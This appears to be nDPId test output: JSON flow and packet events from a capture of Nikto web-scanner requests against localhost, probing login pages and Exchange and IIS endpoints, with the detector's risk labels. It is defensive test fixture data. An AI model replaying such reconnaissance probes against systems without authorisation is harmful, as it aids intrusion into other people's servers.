+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1576420276764,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420276764,"pkt":"AAAAAAAAAAAAAAAACABFAADP8RNAAEAGSxN\/AAABfwAAAcIMH5D+v8k3Lccr2IAYAED+wwAAAQEICp1m+0SdZvtER0VUIC9sb2dpbi5hc3AgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IFRyYW5zbGF0ZS1mICMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276765,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1576420276765,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420276765,"pkt":"AAAAAAAAAAAAAAAACABFAADQIn9AAEAGGad\/AAABfwAAAcIOH5Dotxpb5DtnaoAYAED+xAAAAQEICp1m+0WdZvtFR0VUIC9sb2dpbi5hc3B4IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogVHJhbnNsYXRlLWYgIzEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276765,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7560000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276768,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1576420276768,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420276768,"pkt":"AAAAAAAAAAAAAAAACABFAAC2dlNAAEAGxex\/AAABfwAAAcIQH5C4PE56dk2whIAYAED+qgAAAQEICp1m+0idZvtIR0VUIC8gSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7560000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276768,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420276770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1576420276770,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420276770,"pkt":"AAAAAAAAAAAAAAAACABFAAC8XLtAAEAG335\/AAABfwAAAcISH5CeUGSSsmiGvoAYAED+sAAAAQEICp1m+0qdZvtKR0VUIC9pbWFnZXMgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420276770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7560000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420276771,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1576420276771,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420276771,"pkt":"AAAAAAAAAAAAAAAACABFAADTCw5AAEAGMRV\/AAABfwAAAcIUH5CyKDMlKN\/VCYAYAED+xwAAAQEICp1m+0udZvtLR0VUIC9BdXRvZGlzY292ZXIvQXV0b2Rpc2NvdmVyLnhtbCBIVFRQLzEuMA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7560000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420276771,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1576420276773,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276773,"pkt":"AAAAAAAAAAAAAAAACABFAADDAPJAAEAGO0F\/AAABfwAAAcIWH5B1lTjaOiDdGIAYAED+twAAAQEICp1m+02dZvtMR0VUIC9BdXRvZGlzY292ZXIvIEhUVFAvMS4wDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KDQo="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known 
Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7560000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276774,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1576420276774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":223,"pkt_l4_len":189,"thread_ts_msec":1576420276774,"pkt":"AAAAAAAAAAAAAAAACABFAADRNpRAAEAGBZF\/AAABfwAAAcIYH5C\/CA68jFESSoAYAED+xQAAAQEICp1m+06dZvtOR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7560000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276774,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1576420276776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420276776,"pkt":"AAAAAAAAAAAAAAAACABFAADdUNZAAEAG60J\/AAABfwAAAcIaH5Ae8Gj\/tlcbuIAYAED+0QAAAQEICp1m+1CdZvtPR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMvZGVmYXVsdC5jc3MgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1576420276777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276777,"pkt":"AAAAAAAAAAAAAAAACABFAAC51DJAAEAGaAp\/AAABfwAAAcIcH5BDaOwb++ns54AYAED+rQAAAQEICp1m+1GdZvtRR0VUIC9FQ1AgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276779,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1576420276779,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276779,"pkt":"AAAAAAAAAAAAAAAACABFAAC5SehAAEAG8lR\/AAABfwAAAcIeH5AlzXHNG7GlzoAYAED+rQAAAQEICp1m+1OdZvtTR0VUIC9FV1MgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276779,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1576420276780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276780,"pkt":"AAAAAAAAAAAAAAAACABFAADH3u5AAEAGXUB\/AAABfwAAAcIgH5D8fubIriLokYAYAED+uwAAAQEICp1m+1SdZvtUR0VUIC9FV1MvRXhjaGFuZ2UuYXNteCBIVFRQLzEuMA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known 
Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7560000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420276781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1576420276781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"thread_ts_msec":1576420276781,"pkt":"AAAAAAAAAAAAAAAACABFAAC+Y8xAAEAG2Gt\/AAABfwAAAcIiH5D+h1vitMrGVIAYAED+sgAAAQEICp1m+1WdZvtVR0VUIC9FeGNoYW5nZSBIVFRQLzEuMA0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCg0K"} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7560000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420276781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 